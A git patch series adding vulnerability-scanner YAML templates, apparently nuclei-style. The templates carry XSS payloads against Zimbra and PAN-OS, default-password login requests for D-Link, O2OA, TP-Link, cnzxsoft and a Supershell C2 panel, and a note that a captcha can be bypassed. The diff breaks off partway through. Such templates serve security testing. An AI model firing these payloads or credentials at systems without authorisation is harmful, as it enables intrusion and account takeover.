From e3ffead64fe14fd924e62634c488a3dd79798cc9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jul 2023 23:57:03 +0530 Subject: [PATCH 0001/1090] Create CVE-2023-34192.yaml (Zimbra XSS) --- http/cves/2023/CVE-2023-34192.yaml | 49 ++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2023/CVE-2023-34192.yaml diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml new file mode 100644 index 0000000000..4fdc9dd6c4 --- /dev/null +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-34192 + +info: + name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting + author: ritikchaddha + severity: high + description: | + Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + reference: + - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA + - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 + classification: + cve-id: CVE-2023-34192 + metadata: + max-request: 1 + shodan-query: http.favicon.hash:475145467 + fofa-query: icon_hash="475145467" + tags: cve,cve2023,zimbra,xss,authenticated + +http: + - raw: + - | + POST /zimbra/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginOp=login&username={{username}}&password={{password}}&client=preferred + + - | + GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From bfc27c95d8cd2c4787c3f17967b9f6a23838de39 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Tue, 1 Aug 2023 07:56:42 +0800 Subject: [PATCH 0002/1090] Update CVE-2020-2036.yaml --- http/cves/2020/CVE-2020-2036.yaml | 41 +++++++++++++++++-------------- 1 file changed, 23 insertions(+), 18 deletions(-) diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index a9e00a1871..7bb2b2edd5 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -2,7 +2,7 @@ id: CVE-2020-2036 info: name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting - author: madrobot + author: madrobot,j4vaovo severity: high description: | PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. @@ -18,31 +18,36 @@ info: epss-score: 0.0109 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: - max-request: 2 + max-request: 3 vendor: paloaltonetworks product: pan-os tags: cve,cve2020,vpn,xss http: - - method: GET - path: - - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + - raw: + - | + GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E HTTP/1.1 + Host: {{Hostname}} + + - | + GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1 + Host: {{Hostname}} + + - | + GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1 + Host: {{Hostname}} stop-at-first-match: true matchers-condition: and matchers: - - type: word - part: body - words: - - "" + - type: dsl + dsl: + - "!contains(tolower(body_1), '')" + condition: and - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" + - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" + condition: or From ef89c8637f5b704f5477f4113d8f6272cb7e2c16 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Tue, 1 Aug 2023 08:03:49 +0800 Subject: [PATCH 0003/1090] Update CVE-2020-2036.yaml --- http/cves/2020/CVE-2020-2036.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 7bb2b2edd5..7ea4ef0766 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -37,8 +37,6 @@ http: GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1 Host: {{Hostname}} - stop-at-first-match: true - matchers-condition: and matchers: - type: dsl From a8d056b7aa9f9cf240cdaf89d0ea2555c0ce43b6 Mon Sep 17 00:00:00 2001 From: SleepingBag945 <794087777@qq.com> Date: Fri, 18 Aug 2023 05:22:06 +0200 Subject: [PATCH 0004/1090] Added some Templates --- ...lized-management-system-default-login.yaml | 43 ++++++++++ .../o2oa/o2oa-default-login.yaml | 34 ++++++++ ...ity-management-system-default-account.yaml | 29 +++++++ .../others/supershell-default-login.yaml | 32 ++++++++ .../tp-link-tl-r470gp-ac-default-login.yaml | 34 ++++++++ .../landray/landray-oa-datajson-rce.yaml | 29 +++++++ .../landray/landray-oa-erp-data-rce.yaml | 32 ++++++++ ...andray-oa-sysSearchMain-editParam-rce.yaml | 37 +++++++++ .../landray/landray-oa-treexml-rce.yaml | 37 +++++++++ ...ort-component-arbitrary-file-download.yaml | 32 ++++++++ ...telligent-campus-system-password-leak.yaml | 39 +++++++++ .../other/aruba-instant-default-login.yaml | 27 +++++++ ...xecl-download-arbitrary-file-download.yaml | 25 ++++++ ...rtrust-default-password-vulnerability.yaml | 27 +++++++ .../other/cloud-oa-system-sqli.yaml | 42 ++++++++++ .../other/cmseasy-crossall-act-sqli.yaml | 33 ++++++++ .../other/consul-rexec-rce.yaml | 34 ++++++++ .../other/consul-service-rce.yaml | 35 ++++++++ .../other/h2console-unauth.yaml | 29 +++++++ ...bibliographic-search-system-info-leak.yaml | 33 ++++++++ .../other/kemai-ras-ultra-vires-access.yaml | 41 ++++++++++ .../kingdee-apusic-directory-traversal.yaml | 41 ++++++++++ .../other/sanhui-smg-file-read.yaml | 46 +++++++++++ .../other/zhixiang-oa-msglog-sqli.yaml | 28 +++++++ .../qax/unauthenticated-qax-vpn-access.yaml | 25 ++++++ .../realor-gwt-system-sql-injection.yaml | 40 +++++++++ .../ruijie-nbr-router-fileupload-upload.yaml | 30 +++++++ .../sangfor/sangfor-ad-rce.yaml | 29 +++++++ ...secworld-secgate-3600-firewall-upload.yaml | 56 +++++++++++++ .../seeyon/seeyon-ajax-unauth.yaml | 40 +++++++++ .../seeyon-oa-a6-config-jsp-info-leak.yaml | 31 +++++++ .../seeyon-oa-a6-createMysql-info-leak.yaml | 31 +++++++ ...n-oa-a6-initDataAssess-user-info-leak.yaml | 31 +++++++ .../seeyon/seeyon-oa-a6-setextno-sqli.yaml | 29 +++++++ .../seeyon/seeyon-oa-a8-default-login.yaml | 32 ++++++++ ...seeyon-oa-a8-m-information-disclosure.yaml | 44 ++++++++++ .../seeyon/seeyon-oa-fastjson-rce.yaml | 28 +++++++ .../seeyon/seeyon-oa-log4jshell.yaml | 28 +++++++ ...psAssistServlet-arbitrary-file-upload.yaml | 29 +++++++ .../shiziyu-cms-apicontroller-sqli.yaml | 26 ++++++ .../smartbi/smartbi-default-user.yaml | 33 ++++++++ ...artbi-windowunloading-deserialization.yaml | 31 +++++++ .../spring/jolokia-logback-jndi-rce.yaml | 33 ++++++++ .../spring/jolokia-realm-jndi-rce.yaml | 33 ++++++++ .../spring/springboot-env-all-check.yaml | 49 +++++++++++ .../thinkphp/thinkphp6-lang-lfi.yaml | 35 ++++++++ ...ngda-oa-api-ali-arbitrary-file-upload.yaml | 45 +++++++++++ .../tongda/tongda-oa-getdata-rce.yaml | 26 ++++++ ...a-oa-getway-remote-file-include-mysql.yaml | 36 +++++++++ .../tongda-oa-getway-remote-file-include.yaml | 31 +++++++ .../tongda-oa-header-inc-arbitrary-login.yaml | 44 ++++++++++ .../tongda/tongda-oa-insert-sqli.yaml | 33 ++++++++ .../tongda-oa-login-code-arbitrary-login.yaml | 52 ++++++++++++ .../tongda/tongda-oa-meeting-unauth.yaml | 37 +++++++++ .../tongda/tongda-oa-report-bi-func-sqli.yaml | 28 +++++++ .../tongda/tongda-oa-swfupload-sqli.yaml | 50 ++++++++++++ ...da-oa-v2014-get-contactlist-info-leak.yaml | 35 ++++++++ ...7-action-upload-arbitrary-file-upload.yaml | 61 ++++++++++++++ ...-v2017-video-file-arbitrary-file-read.yaml | 29 +++++++ .../topsec/topsec-topacm-rce.yaml | 36 +++++++++ .../topsec-topapplb-arbitrary-user-login.yaml | 33 ++++++++ .../wanhu/wanhu-oa-documentedit-sqli.yaml | 30 +++++++ ...u-oa-download-ftp-arbitrary-file-read.yaml | 29 +++++++ ...u-oa-download-old-arbitrary-file-read.yaml | 29 +++++++ ...load-controller-arbitrary-file-upload.yaml | 48 +++++++++++ ...ceserverservlet-arbitrary-file-upload.yaml | 27 +++++++ ...-oa-smartupload-arbitrary-file-upload.yaml | 29 +++++++ ...u-oa-teleconferenceservice-xxe-inject.yaml | 28 +++++++ .../wayos-ac/wayos-ac-weak-login.yaml | 47 +++++++++++ .../weaver/CNVD-2023-12632.yaml | 41 ++++++++++ .../weaver/ecology-oa-byxml-xxe.yaml | 24 ++++++ ...ecology-oa-filedownloadforoutdoc-sqli.yaml | 25 ++++++ ...-e-bridge-linux-saveyzjfile-file-read.yaml | 45 +++++++++++ ...-bridge-windows-saveyzjfile-file-read.yaml | 45 +++++++++++ .../weaver-e-cology-bshservlet-rce.yaml | 40 +++++++++ .../weaver/weaver-e-cology-getdata-sqli.yaml | 33 ++++++++ .../weaver-e-cology-getsqldata-sqli.yaml | 35 ++++++++ ...-e-cology-hrmcarreerapplyperview-sqli.yaml | 30 +++++++ ...gy-jqueryfiletree-directory-traversal.yaml | 33 ++++++++ ...reeuploadaction-arbitrary-file-upload.yaml | 53 ++++++++++++ .../weaver/weaver-e-cology-loginsso-sqli.yaml | 38 +++++++++ ...orportalthumbnail-arbitrary-file-read.yaml | 32 ++++++++ ...uploadoperation-arbitrary-file-upload.yaml | 81 +++++++++++++++++++ .../weaver/weaver-e-cology-validate-sqli.yaml | 34 ++++++++ ...logy-verifyquicklogin-arbitrary-login.yaml | 41 ++++++++++ ...-e-cology-workflowcentertreedata-sqli.yaml | 39 +++++++++ .../weaver/weaver-e-mobile-client-do-rce.yaml | 43 ++++++++++ .../weaver-e-office-group-xml-sqli.yaml | 34 ++++++++ ...eaver-e-office-login-quick-seesionkey.yaml | 44 ++++++++++ ...ile-upload-save-arbitrary-file-upload.yaml | 51 ++++++++++++ ...eaver-e-office-mysql-config-info-leak.yaml | 30 +++++++ ...fice-officeserver-arbitrary-file-read.yaml | 31 +++++++ ...ffice-uploadify-arbitrary-file-upload.yaml | 66 +++++++++++++++ ...fice-uploadify-arbitrary-file-upload2.yaml | 53 ++++++++++++ ...fice-uploadify-arbitrary-file-upload3.yaml | 59 ++++++++++++++ .../weaver-e-office-userselect-unauth.yaml | 31 +++++++ ...0-office-server-arbitrary-file-upload.yaml | 80 ++++++++++++++++++ ...ice-xmlrpcservlet-arbitrary-file-read.yaml | 33 ++++++++ ...signaturedownload-arbitrary-file-read.yaml | 36 +++++++++ ...gy-oa-plugin-checkserver-setting-sqli.yaml | 29 +++++++ .../wechat/wechat-info-leak.yaml | 25 ++++++ .../yonyou/chanjet-tplus-checkmutex-sqli.yaml | 26 ++++++ ...et-tplus-getstorewarehousebystore_rce.yaml | 67 +++++++++++++++ .../yonyou/chanjetcrm-createsite-sqli.yaml | 21 +++++ ...yonyou-chanjet-remote-gnfunction-sqli.yaml | 52 ++++++++++++ .../yonyou-chanjet-tplus-file-upload.yaml | 40 +++++++++ .../yonyou-chanjet-tplus-ufida-sqli.yaml | 35 ++++++++ ...chanjie-tplus-downloadproxy-file-read.yaml | 29 +++++++ ...-uploadfiledata-arbitrary-file-upload.yaml | 51 ++++++++++++ .../yonyou/yonyou-fe-directory-traversal.yaml | 34 ++++++++ .../yonyou/yonyou-grp-u8-sqli.yaml | 39 +++++++++ ...-uploadfiledata-arbitrary-file-upload.yaml | 45 +++++++++++ ...onyou-nc-accept-arbitrary-file-upload.yaml | 52 ++++++++++++ ...app-uploadservlet-deserialization-rce.yaml | 22 +++++ .../yonyou-nc-bshservlet-full-check.yaml | 79 ++++++++++++++++++ ...patcher-servlet-arbitrary-file-upload.yaml | 33 ++++++++ ...ereceiveservlet-arbitrary-file-upload.yaml | 33 ++++++++ .../yonyou-nc-grouptemplet-file-upload.yaml | 39 +++++++++ .../yonyou-nc-ncmessageservlet-rce.yaml | 44 ++++++++++ .../yonyou-nc-uapjs-jsinvoke-fileupload.yaml | 42 ++++++++++ .../yonyou-u8-crm-getemaildata-file-read.yaml | 23 ++++++ ...onyou-u8-crm-getemaildata-file-upload.yaml | 39 +++++++++ .../yonyou/yonyou-ufida-nc-username-leak.yaml | 23 ++++++ http/vulnerabilities/zyxel/CVE-2022-0342.yaml | 41 ++++++++++ 124 files changed, 4628 insertions(+) create mode 100755 http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml create mode 100755 http/default-logins/o2oa/o2oa-default-login.yaml create mode 100755 http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml create mode 100644 http/default-logins/others/supershell-default-login.yaml create mode 100755 http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml create mode 100755 http/vulnerabilities/landray/landray-oa-datajson-rce.yaml create mode 100755 http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml create mode 100755 http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml create mode 100755 http/vulnerabilities/landray/landray-oa-treexml-rce.yaml create mode 100755 http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml create mode 100755 http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml create mode 100755 http/vulnerabilities/other/aruba-instant-default-login.yaml create mode 100755 http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml create mode 100755 http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml create mode 100644 http/vulnerabilities/other/cloud-oa-system-sqli.yaml create mode 100755 http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml create mode 100755 http/vulnerabilities/other/consul-rexec-rce.yaml create mode 100755 http/vulnerabilities/other/consul-service-rce.yaml create mode 100755 http/vulnerabilities/other/h2console-unauth.yaml create mode 100755 http/vulnerabilities/other/huiwen-bibliographic-search-system-info-leak.yaml create mode 100755 http/vulnerabilities/other/kemai-ras-ultra-vires-access.yaml create mode 100755 http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml create mode 100755 http/vulnerabilities/other/sanhui-smg-file-read.yaml create mode 100755 http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml create mode 100755 http/vulnerabilities/qax/unauthenticated-qax-vpn-access.yaml create mode 100644 http/vulnerabilities/realor/realor-gwt-system-sql-injection.yaml create mode 100644 http/vulnerabilities/ruijie/ruijie-nbr-router-fileupload-upload.yaml create mode 100644 http/vulnerabilities/sangfor/sangfor-ad-rce.yaml create mode 100644 http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml create mode 100755 http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml create mode 100755 http/vulnerabilities/smartbi/smartbi-default-user.yaml create mode 100755 http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml create mode 100755 http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml create mode 100755 http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml create mode 100755 http/vulnerabilities/spring/springboot-env-all-check.yaml create mode 100755 http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/topsec/topsec-topacm-rce.yaml create mode 100755 http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-download-old-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml create mode 100755 http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml create mode 100755 http/vulnerabilities/weaver/CNVD-2023-12632.yaml create mode 100755 http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml create mode 100755 http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml create mode 100644 http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml create mode 100644 http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml create mode 100644 http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml create mode 100644 http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml create mode 100644 http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml create mode 100755 http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml create mode 100644 http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml create mode 100644 http/vulnerabilities/wechat/wechat-info-leak.yaml create mode 100755 http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml create mode 100644 http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml create mode 100755 http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml create mode 100644 http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml create mode 100644 http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml create mode 100644 http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml create mode 100644 http/vulnerabilities/zyxel/CVE-2022-0342.yaml diff --git a/http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml b/http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml new file mode 100755 index 0000000000..7ff252b106 --- /dev/null +++ b/http/default-logins/d-link/d-link-ac-centralized-management-system-default-login.yaml @@ -0,0 +1,43 @@ +id: d-link-ac-centralized-management-system-default-login + +info: + name: D-Link AC Centralized management system Default weak password + author: SleepingBag945 + severity: medium + description: | + Access to sensitive information + metadata: + fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页" + tags: Default weak password + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user=admin&password=admin + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && !contains(body_1,"flag=0")' + condition: and + + - type: word + part: header + words: + - "Set-Cookie" + - "ac_userid" + condition: and + + - type: word + part: body + words: + - "window.open" + condition: and + + diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml new file mode 100755 index 0000000000..b0237dc850 --- /dev/null +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -0,0 +1,34 @@ +id: o2oa-default-login + +info: + name: O2OA Default Login + author: SleepingBag945 + severity: critical + description: O2O存在默认密码xadmin/o2,登录后台可执行系统命令 + tags: o2oa,default-login + +http: + - raw: + - | + POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1 + Host: {{Hostname}} + Cookie: x-token=anonymous + Authorization: anonymous + Accept: text/html,application/json,*/* + Content-Type: application/json; charset=UTF-8 + + {"credential":"xadmin","password":"o2"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "\"type\": \"success\"" + - "distinguishedName" + part: body + condition: and + +# 执行命令看这里 http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20后台远程命令执行漏洞%20CNVD-2020-18740.html diff --git a/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml b/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml new file mode 100755 index 0000000000..e9e7e92288 --- /dev/null +++ b/http/default-logins/others/cnzxsoft-information-security-management-system-default-account.yaml @@ -0,0 +1,29 @@ +id: cnzxsoft-information-security-management-system-default-login + +info: + name: cnzxsoft information security management system default account + author: SleepingBag945 + severity: high + description: | + cnzxsoft Golden Shield Information Security Management System has a default weak password. + tags: default + +http: + - raw: + - | + POST /?q=common/login HTTP/1.1 + Host: {{Hostname}} + Cookie: check_code=ptbh + Content-Type: application/x-www-form-urlencoded + + name=admin&password=zxsoft1234!%40%23%24&checkcode=ptbh&doLoginSubmit=1 + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1,"1") && contains(header_1,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")' + condition: and + +#zxsoft1234!@#$ +#验证码能绕过,直接登录即可 \ No newline at end of file diff --git a/http/default-logins/others/supershell-default-login.yaml b/http/default-logins/others/supershell-default-login.yaml new file mode 100644 index 0000000000..986f882726 --- /dev/null +++ b/http/default-logins/others/supershell-default-login.yaml @@ -0,0 +1,32 @@ +id: supershell-default-login + +info: + name: supershell 默认密码 + author: SleepingBag945 + severity: high + description: | + Supershell 是一个通过 WEB 服务访问的 C2 远控平台。SuperShell 存在默认口令漏洞,可通过 tdragon6:tdragon6 登陆获取系统权限。 + reference: + - https://github.com/tdragon6/Supershell + tags: supershell + +http: + - raw: + - | + POST /supershell/login/auth HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Requested-With: XMLHttpRequest + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + {"username":"tdragon6","password":"tdragon6"} + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && !contains(body_1,"failed") + - contains(header_1,"token=ey") && contains(body_1,"success") + condition: and diff --git a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml b/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml new file mode 100755 index 0000000000..236ef6136b --- /dev/null +++ b/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml @@ -0,0 +1,34 @@ +id: tp-link-tl-r470gp-ac-default-login + +info: + name: TP-LINK TL-R470GP-AC Default weak password + author: SleepingBag945 + severity: high + description: | + TP-LINK TL-R470GP-AC 默认口令123456 + metadata: + fofa-query: title="TL-R470GP-AC" + tags: tp-link,default-login,ac + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Connection: close + + {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}} + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"stok\"" + - "\"error_code\":0" + condition: and + + diff --git a/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml b/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml new file mode 100755 index 0000000000..1cb35bec70 --- /dev/null +++ 